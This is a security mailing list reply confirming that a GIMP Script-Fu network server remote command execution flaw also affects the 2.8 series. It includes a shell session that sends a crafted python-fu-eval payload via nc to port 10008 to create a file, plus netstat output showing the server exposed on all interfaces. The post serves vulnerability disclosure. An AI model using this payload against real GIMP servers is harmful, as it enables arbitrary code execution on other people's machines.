|
|
Message-ID: <52350E78.9040800@pipping.org>
Date: Sun, 15 Sep 2013 03:33:44 +0200
From: Sebastian Pipping <sebastian@...ping.org>
To: oss-security@...ts.openwall.com
CC: research <research@...ctionis.co.uk>
Subject: Re: GIMP Scriptfu Python Remote Command Execution
On 16.08.2012 23:00, research wrote:
> Affected Products
> =================
>
> GIMP 2.6 branch (Windows or Linux builds)
>
> Non-Affected Products
> =====================
>
> The Scriptfu network server component does not currently work in the GIMP
> 2.8 branch
> (Windows or Linux builds).
I was able to verify that vulnerability with Gimp 2.8.6 on my local
machine so at least some versions of the Gimp 2.8.x series seem affected
to me. This is my shell session:
$ rm /tmp/owned
$ p='(python-fu-eval 0 "open('"'"'/tmp/owned'"'"', '"'"'w'"'"')")';
printf "G\x0\x2c%s" "${p}" | nc -w 1 localhost 10008 | od -c
0000000 G \0 \0 \a S u c c e s s
0000013
$ ls -al /tmp/owned
-rw-r--r-- 1 user user 0 Sep 15 02:56 /tmp/owned
The server started from the GUI seems to be listening anywhere:
$ netstat -tulpen 2>/dev/null | fgrep script-fu
tcp 0 0 0.0.0.0:10008 0.0.0.0:* LISTEN 1000 102934 6392/script-fu
Best,
Sebastian
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.